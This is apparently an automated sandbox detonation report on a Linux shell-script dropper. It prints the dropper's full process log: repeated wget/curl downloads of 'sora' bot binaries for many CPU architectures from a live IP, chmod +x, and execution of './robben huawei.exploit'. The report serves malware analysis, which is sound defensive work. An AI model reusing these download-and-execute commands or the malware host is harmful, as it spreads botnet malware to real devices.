File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh N/A

Processes

/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:38

Platform

debian9-mipsel-20240418-en

Max time kernel

31s

Max time network

29s

Command Line

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh N/A

Processes

/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]

/tmp/robben

[./robben huawei.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A